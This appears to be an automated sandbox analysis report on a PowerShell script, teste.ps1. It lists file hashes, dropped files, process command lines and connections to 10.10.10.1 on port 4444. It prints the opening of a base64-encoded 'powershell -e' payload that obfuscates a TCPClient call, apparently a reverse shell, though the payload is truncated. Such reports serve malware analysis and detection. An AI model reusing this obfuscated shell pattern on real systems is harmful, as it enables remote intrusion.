                                    MD5:15A36A2D78B70337CF6F4D721277377E
                                    SHA1:CF533EF34652F5487391AC0D5F715F524754991B
                                    SHA-256:77C14BC6D8CF9C5C39474C1E52FE2338686E2ACDA93E4AAC442FCD19A8A420DB
                                    SHA-512:C915066281A96A2BCC148AC0F482E807F2C0FBAA36318A8B3C390D28E1BD83ADBAC52CAE650F57A2E6499BEA83DC28BB9B59C5AEB073A7C4F59C3FF1229CAD55
                                    Malicious:false
                                    Reputation:low
                                    Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x29b037a5, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.42215470962374013
                                    Encrypted:false
                                    SSDEEP:1536:hSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:haza/vMUM2Uvz7DO
                                    MD5:E9A5708B1ABE0894FFC5C69679D9BB48
                                    SHA1:ECA78455F6B042CFD2EBCF398A56C50328A75EBA
                                    SHA-256:63F0B6E31C8E67DC1124099EF541A7A37D6F5AB89FC32C0F7350A0BE604749CC
                                    SHA-512:9F8113A0878DB79D114B756DDD878F062A3D6DB166D27E653CEA1C48055214333623CCB69066E9475D2556FCF3611E92537D5A7EF30D6E07244B4267EA45C0DD
                                    Malicious:false
                                    Reputation:low
                                    Preview:).7.... .......A.......X\...;...{......................0.!..........{A......}'.h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{...................................X.U.....}'..................*.Y.....}'..........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.07740235398825662
                                    Encrypted:false
                                    SSDEEP:3:Mb//KYeOTONuGjjn13a/cWYM/lallcVO/lnlZMxZNQl:Mb//Kz6Gj53qc0/AOewk
                                    MD5:A7C0FB7127DC1B8302D62C95B4B57597
                                    SHA1:25C39696043D88E3FFD1CCAC89176F7B733D5971
                                    SHA-256:6DCBF4D88489387D83015593A4E69A4945482801926749C3B5C2AF2FE09F92BF
                                    SHA-512:6F9AFB6F8C3CE455B2FEBF44E7E97434BA95A1848FAE33944EFF4AE9347D3F41DF4541619AFD53497AACABEDE876031B04DC3E6FA58E435D34FA392B32D821F2
                                    Malicious:false
                                    Reputation:low
                                    Preview:.iL[.....................................;...{.......}'......{A..............{A......{A..........{A].................*.Y.....}'.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):5829
                                    Entropy (8bit):4.901113710259376
                                    Encrypted:false
                                    SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                    MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                    SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                    SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                    SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulp77th:NllU
                                    MD5:7B5F360646F3167812DC4ADF7B166512
                                    SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
                                    SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
                                    SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e.................................x..............@..........
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):6221
                                    Entropy (8bit):3.738580826961919
                                    Encrypted:false
                                    SSDEEP:48:pYi2TNFR0eLzr3CUU2J5jLukvhkvklCywxEmdrx0pnL7ccSogZoaRrCLx0pnL7ck:E5Aez3Cl+5GkvhkvCCtpyFLAHWyFLAHK
                                    MD5:E600B6BFCD3D186B0FBD2606545D2997
                                    SHA1:29F44FE75EE69D68EA49AA7D41814B0F6B197861
                                    SHA-256:645B0001044B653558F735B63C8917B30E483F8A49B8EB4E7DAC5374EBFB6C92
                                    SHA-512:367E84183E728E2B72BB793369CF67FF5B20CDEC3A0EB4BDE0193A7BE35FBAF57CC56C0E392DCB38459C84D198D8A1DBB05041DADEC5AE773ECADCE276D4DD13
                                    Malicious:false
                                    Preview:...................................FL..................F.".. ...-/.v....)..@....z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....'..$...w-.).......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Z.............................%..A.p.p.D.a.t.a...B.V.1......Z....Roaming.@......CW.^.Z............................(PT.R.o.a.m.i.n.g.....\.1.....gZ.T..MICROS~1..D......CW.^gZ.T..........................pr1.M.i.c.r.o.s.o.f.t.....V.1.....gZ9T..Windows.@......CW.^gZ9T..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^gZ.T....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^gZ.T....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^gZaS..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^DW.V....Q...........
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):55
                                    Entropy (8bit):4.306461250274409
                                    Encrypted:false
                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                    Malicious:false
                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                    File type:ASCII text, with very long lines (2578), with no line terminators
                                    Entropy (8bit):4.222137623286222
                                    TrID:
                                      File name:teste.ps1
                                      File size:2'578 bytes
                                      MD5:d43f3078147348d65e6d45b0dd8bb9b6
                                      SHA1:26d97115d6dad035bd6b2b3c14fa56871649e3ce
                                      SHA256:b8f1effbb4aa7ce402352b78e0b8aa1245a1e47cf551ce9f15b8235a1d88cdf8
                                      SHA512:4179505181a9a8428f2dc442deb126a7c4eb5086d75716a1d00bbdd31b2b2d3aca2fb47f4bd19a73e318dd59330136caf36539319b21ce972cdb1d320b2af357
                                      SSDEEP:48:ObqXDXbIV9GzB+j2X3Vs4O1Kbw2915VmpVWgbbfnubzpsrbpDMz0ikJvyfnN:GqXLbCGz3s4OI1nmWgvnubI1gfk54N
                                      TLSH:B351BFFDDC36BEC403BE71D42DAA3E8610586613C9B54AF4EA4909E37524348DF396AC
                                      File Content Preview:powershell -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAI

                                      Timestamp                             Source Port  Dest Port  Source IP    Dest IP
                                      Apr 26, 2025 21:05:24.886188984 CEST  49714        4444       192.168.2.4  10.10.10.1
                                      Apr 26, 2025 21:05:25.901607037 CEST  49714        4444       192.168.2.4  10.10.10.1
                                      Apr 26, 2025 21:05:27.917243004 CEST  49714        4444       192.168.2.4  10.10.10.1
                                      Apr 26, 2025 21:05:31.917256117 CEST  49714        4444       192.168.2.4  10.10.10.1
                                      Apr 26, 2025 21:05:39.917280912 CEST  49714        4444       192.168.2.4  10.10.10.1

                                      Target ID:0
                                      Start time:15:05:22
                                      Start date:26/04/2025
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1"
                                      Imagebase:0xb60000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:1
                                      Start time:15:05:22
                                      Start date:26/04/2025
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff62fc20000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:15:05:22
                                      Start date:26/04/2025
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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
                                      Imagebase:0xb60000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:15:05:28
                                      Start date:26/04/2025
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                      Imagebase:0x7ff6ca680000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:false

                                      • Instruction Fuzzy Hash: F9110734A00209EFDB15DFA8D894E9DBBB2BF48314F288558E405AB361C775EC86CF50
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1369997019.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_4c9d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cdf7d5880399ecb71fcc0ed1f5b86a5b55c2a6a998fde181f4f86ca0376f52dd
                                      • Instruction ID: 4b1e129812e598b06179a9ce48e15ef3f041e2d295830cc4510f8a86241212ab
                                      • Opcode Fuzzy Hash: cdf7d5880399ecb71fcc0ed1f5b86a5b55c2a6a998fde181f4f86ca0376f52dd
                                      • Instruction Fuzzy Hash: 5B01527140E3C06FD7128B259D98B52BFB4EF43224F19C1DBD8889F193C2695849CB72
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1369997019.0000000004C9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_4c9d000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 966865db6ffa8ebf34fd066ab0e4ad6647619f44c2c3884db1d2b5ac541ae452
                                      • Instruction ID: 3e72457db08bf5796cf9612e80343411142d473abe47d07312f64f164c0b0e11
                                      • Opcode Fuzzy Hash: 966865db6ffa8ebf34fd066ab0e4ad6647619f44c2c3884db1d2b5ac541ae452
                                      • Instruction Fuzzy Hash: 6001F731504340BAEB204E12DDC8B67FBD9EF41220F08C159EC4A1F282D679AD41CAB1

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$tPq$tPq$#k$$q$$q$$q
                                      • API String ID: 0-492062855
                                      • Opcode ID: eed436f005711ec2073cf64381cf7a568085a2ac888804fa12ed31a8b3e1bc8d
                                      • Instruction ID: a032f9c123ac421579ecb2d34a53d17fecb228b5eba0bd43644c412d248eaf7d
                                      • Opcode Fuzzy Hash: eed436f005711ec2073cf64381cf7a568085a2ac888804fa12ed31a8b3e1bc8d
                                      • Instruction Fuzzy Hash: 068137B1700316DFD7358B6994817BBBBE2AFC5210F18806AE845CB791DB32DD85CBA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$tPq$tPq$tPq$tPq
                                      • API String ID: 0-1597207323
                                      • Opcode ID: ed3ea3a7fe5f2814b7c711eb9dad304ddc8f51561f8875f4b6b6131c7aa26e77
                                      • Instruction ID: 8d9c0fe955c359e939ca3340d0e406f804457494b8157c2fd5ab9f03806e88a2
                                      • Opcode Fuzzy Hash: ed3ea3a7fe5f2814b7c711eb9dad304ddc8f51561f8875f4b6b6131c7aa26e77
                                      • Instruction Fuzzy Hash: DDB13BB1B0434A8FD7308B6688917EBBBF2AF86211F1C806AE5459B281DB31DD41C791
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: tPq$tPq$$q$$q$$q
                                      • API String ID: 0-4232885863
                                      • Opcode ID: 0a0e53dbbf93304c5f686c611a667348cdea9fde1102dc157ebcdaa02eadcfaf
                                      • Instruction ID: 6344a8464c9ddf3d1180bc18cc6859f0b7c052ca3965f481e378aa8444b3b57b
                                      • Opcode Fuzzy Hash: 0a0e53dbbf93304c5f686c611a667348cdea9fde1102dc157ebcdaa02eadcfaf
                                      • Instruction Fuzzy Hash: 7A312A723043199FD7259A6998506A7BBE5AFC5220F2C806BF545CB361CB32ED01C790
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q
                                      • API String ID: 0-4102054182
                                      • Opcode ID: 22f0727d08bc8f6c5cc41f62811c81e19b75e43e9f75ba63224815375211db1c
                                      • Instruction ID: 39c47ad0f20161fe2bfec6f81c1dffc654140ce5d25fd42d044b06886c423370
                                      • Opcode Fuzzy Hash: 22f0727d08bc8f6c5cc41f62811c81e19b75e43e9f75ba63224815375211db1c
                                      • Instruction Fuzzy Hash: D02147B17103C6ABEB3446AAD841BA7B7D6DBC1615F28442BB545CB3C1CE36D90582A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.1374513513.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_2_2_7cb0000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q
                                      • API String ID: 0-3199993180
                                      • Opcode ID: 5e25d10e3b031d9a5a539a565d2c6e9bab53996e4b9306bdb4674bb268e2eef8
                                      • Instruction ID: d53bbdf3c5d67090180d3db95ad88ce0d637bf8868c1e99c6a084ff99c7381eb
                                      • Opcode Fuzzy Hash: 5e25d10e3b031d9a5a539a565d2c6e9bab53996e4b9306bdb4674bb268e2eef8
                                      • Instruction Fuzzy Hash: 3301F2A1B0D3961FC73B12252C211A66F726FC3410B2E4197D1C1DF293CD598D86C3A6